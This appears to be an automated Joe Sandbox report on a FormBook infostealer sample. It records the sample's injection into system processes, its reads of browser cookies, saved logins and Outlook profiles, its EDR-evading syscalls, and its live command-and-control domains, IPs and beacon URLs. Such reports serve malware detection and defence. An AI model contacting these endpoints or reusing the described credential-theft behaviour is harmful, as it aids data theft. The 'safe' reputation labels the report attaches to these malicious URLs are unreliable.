            Source: Yara matchFile source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: psibx9rXra.exeBinary or memory string: WIN_81
            Source: psibx9rXra.exeBinary or memory string: WIN_XP
            Source: psibx9rXra.exeBinary or memory string: WIN_XPe
            Source: psibx9rXra.exeBinary or memory string: WIN_VISTA
            Source: psibx9rXra.exeBinary or memory string: WIN_7
            Source: psibx9rXra.exeBinary or memory string: WIN_8
            Source: psibx9rXra.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00FF6283
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00FF6747
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            2
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets251
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587985 Sample: psibx9rXra.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.moritynomxd.xyz 2->28 30 www.yu35n.top 2->30 32 6 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 psibx9rXra.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 GFwdSeXZEVUZM.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 newdev.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 GFwdSeXZEVUZM.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.moritynomxd.xyz 45.158.77.253, 49988, 49989, 49990 TEDRATEDRABACKBONEES United Kingdom 22->34 36 www.shanhaiguan.net 156.242.132.82, 49992, 49993, 49995 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            psibx9rXra.exe68%ReversingLabsWin32.Trojan.AutoitInject
            psibx9rXra.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.shanhaiguan.net0%Avira URL Cloudsafe
            http://www.shanhaiguan.net/pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl760%Avira URL Cloudsafe
            http://www.shanhaiguan.net/pjwm/0%Avira URL Cloudsafe
            http://www.yu35n.top/k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl760%Avira URL Cloudsafe
            http://www.easestore.shop/0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl760%Avira URL Cloudsafe
            http://www.moritynomxd.xyz/o5i7/0%Avira URL Cloudsafe
            http://www.moritynomxd.xyz/o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl760%Avira URL Cloudsafe
            https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9o0%Avira URL Cloudsafe
            http://www.yu35n.top/k4q2/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            yu35n.top
            154.23.178.183
            truefalse
              unknown
              wearenotgoingback.info
              76.223.105.230
              truefalse
                unknown
                shops.myshopify.com
                23.227.38.74
                truefalse
                  high
                  www.moritynomxd.xyz
                  45.158.77.253
                  truetrue
                    unknown
                    www.shanhaiguan.net
                    156.242.132.82
                    truefalse
                      unknown
                      www.wearenotgoingback.info
                      unknown
                      unknowntrue
                        unknown
                        www.yu35n.top
                        unknown
                        unknowntrue
                          unknown
                          www.easestore.shop
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://www.moritynomxd.xyz/o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl76false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.moritynomxd.xyz/o5i7/false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.yu35n.top/k4q2/false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.yu35n.top/k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl76false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.shanhaiguan.net/pjwm/false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.shanhaiguan.net/pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl76false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.easestore.shop/0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76false
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabnewdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.shanhaiguan.netGFwdSeXZEVUZM.exe, 00000007.00000002.3457739749.0000000005587000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://duckduckgo.com/ac/?q=newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.iconewdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnewdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9onewdev.exe, 00000005.00000002.3458200823.0000000005D14000.00000004.10000000.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000034E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000377D4000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              156.242.132.82
                                              www.shanhaiguan.netSeychelles
                                              132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                              45.158.77.253
                                              www.moritynomxd.xyzUnited Kingdom
                                              60917TEDRATEDRABACKBONEEStrue
                                              23.227.38.74
                                              shops.myshopify.comCanada
                                              13335CLOUDFLARENETUSfalse
                                              154.23.178.183
                                              yu35n.topUnited States
                                              174COGENT-174USfalse
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1587985
                                              Start date and time:2025-01-10 20:07:51 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 11s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:psibx9rXra.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:29c036ae5258e869815a3be9b7ebdab701f69f575796555c52d9eb76c2735217.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@5/4
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 84%
                                              • Number of executed functions: 48
                                              • Number of non-executed functions: 278
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.245.163.56
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • VT rate limit hit for: psibx9rXra.exe
                                              TimeTypeDescription
                                              14:10:02API Interceptor1402350x Sleep call for process: newdev.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              156.242.132.82xBzBOQwywT.exeGet hashmaliciousFormBookBrowse
                                              • www.shanhaiguan.net/b6g5/
                                              N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                              • www.shanhaiguan.net/b6g5/
                                              PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                              • www.shanhaiguan.net/p2q3/
                                              NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                              • www.shanhaiguan.net/p2q3/
                                              DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                              • www.shanhaiguan.net/p2q3/
                                              PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                              • www.shanhaiguan.net/p2q3/
                                              23.227.38.74236236236.elfGet hashmaliciousUnknownBrowse
                                              • lennon.greengoohelps.com/
                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                              • www.domon.com/
                                              sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                              • www.zingara.life/s7qk/
                                              ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.cannulafactory.top/y82c/
                                              8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                              • www.zingara.life/c0mi/
                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                              • www.zingara.life/s7qk/
                                              payment copy.exeGet hashmaliciousFormBookBrowse
                                              • www.zingara.life/s7qk/
                                              ORDER ENQUIRY.exeGet hashmaliciousFormBookBrowse
                                              • www.wergol.com/hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR
                                              ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA
                                              Specification and Quantity Pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.tuktukwines.com/n7ak/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.moritynomxd.xyzwavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              UNGSno5k4G.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 172.81.61.224
                                              POPO00003964.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              Arrival notice.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 172.81.61.224
                                              PO2024033194.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 172.81.61.224
                                              shops.myshopify.comhttps://keycaptoys.com/Get hashmaliciousUnknownBrowse
                                              • 23.227.38.74
                                              L4rN4tX0aH.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              https://summerfieldfarms.com/Get hashmaliciousUnknownBrowse
                                              • 23.227.38.74
                                              https://ambir.com/ambir-card-scanners/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                              • 23.227.38.74
                                              https://sewing-ladyltd.myshopify.com/sol?syclid=365862d9-5d6e-4a94-b401-31f50f547182Get hashmaliciousUnknownBrowse
                                              • 23.227.38.74
                                              De_posit Confirmati0n_ Mitie.htmlGet hashmaliciousUnknownBrowse
                                              • 23.227.38.74
                                              https://app.bitdam.com/api/v1.0/links/rewrite_click/?rewrite_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyZXdyaXRlX2lkIjoiNjcyOGQ2YzliOTFmMDRhNDE1NjM3NTRhIiwidXJsIjoiIiwib3JnYW5pemF0aW9uX2lkIjo1ODQwfQ.Uhd2nS1gN1sUzvqpPDTmoAH1ZU9vF-hNz1sM06cv-iA&url=https%3A//www.google.it/url%3Fq%3Dhttps%3A//www.google.it/url%3Fq%3Dhttps%3A//www.google.it/url%3Fq%3Dhttps%3A//www.google.ro/url%3Fq%3Dhttps%3A//www.google.nl/url%3Fq%3DZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6E%65%77%68%6F%6D%65%73%76%6E%2E%63%6F%6D%2F%63%67%69%2F/3we/Y29saW4uZ3JhbnRAZmlyc3RvbnRhcmlvLmNvbQ==Get hashmaliciousUnknownBrowse
                                              • 23.227.38.74
                                              +1-481-481-XXX_audio.wa.htmlGet hashmaliciousUnknownBrowse
                                              • 23.227.38.74
                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                              • 23.227.38.74
                                              https://www.google.com.sg/url?q=p8v7jruqDC0s&rct=p8v7jruqDC0s&sa=t&esrc=p8v7jruqDC0s&source=&cd=p8v7jruqDC0s&uact=&url=amp%2Famandotuvoz.org/service/jkbhwfdhjkng/frederic.delesalle@treezor.comGet hashmaliciousHTMLPhisherBrowse
                                              • 23.227.38.74
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              POWERLINE-AS-APPOWERLINEDATACENTERHKOVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                              • 156.251.17.224
                                              cbot.exeGet hashmaliciousUnknownBrowse
                                              • 154.213.192.42
                                              cbot.exeGet hashmaliciousUnknownBrowse
                                              • 154.213.192.42
                                              NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                              • 154.213.39.66
                                              armv4l.elfGet hashmaliciousUnknownBrowse
                                              • 156.253.200.172
                                              https://199.188.109.181Get hashmaliciousUnknownBrowse
                                              • 154.203.26.164
                                              Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                              • 156.243.249.53
                                              sora.arm7.elfGet hashmaliciousUnknownBrowse
                                              • 154.216.35.228
                                              DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                              • 154.215.72.110
                                              gompsl.elfGet hashmaliciousMiraiBrowse
                                              • 156.251.7.182
                                              CLOUDFLARENETUSinvoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                              • 172.64.41.3
                                              CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 104.21.32.1
                                              bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.7.187
                                              m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              • 104.21.96.1
                                              Message 2.emlGet hashmaliciousUnknownBrowse
                                              • 172.64.41.3
                                              FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.96.1
                                              jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.96.1
                                              frosty.arm.elfGet hashmaliciousMiraiBrowse
                                              • 104.23.145.230
                                              Message.emlGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              TEDRATEDRABACKBONEESx86.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 45.159.66.123
                                              Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.188
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 45.159.66.169
                                              COGENT-174USOVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                              • 38.181.21.178
                                              pKXxiawkTj.exeGet hashmaliciousXWormBrowse
                                              • 154.39.0.150
                                              frosty.arm.elfGet hashmaliciousMiraiBrowse
                                              • 154.62.137.46
                                              frosty.spc.elfGet hashmaliciousMiraiBrowse
                                              • 38.148.77.12
                                              frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 23.154.10.225
                                              cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.178.231
                                              zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                              • 38.181.21.54
                                              https://sign-as.allarknow.online/Get hashmaliciousUnknownBrowse
                                              • 50.7.127.10
                                              http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                              • 143.244.56.53
                                              https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                              • 50.7.24.35
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\newdev.exe
                                              File Type:Unknown
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.1239949490932863
                                              Encrypted:false
                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                              MD5:271D5F995996735B01672CF227C81C17
                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\psibx9rXra.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):288256
                                              Entropy (8bit):7.994941364645655
                                              Encrypted:true
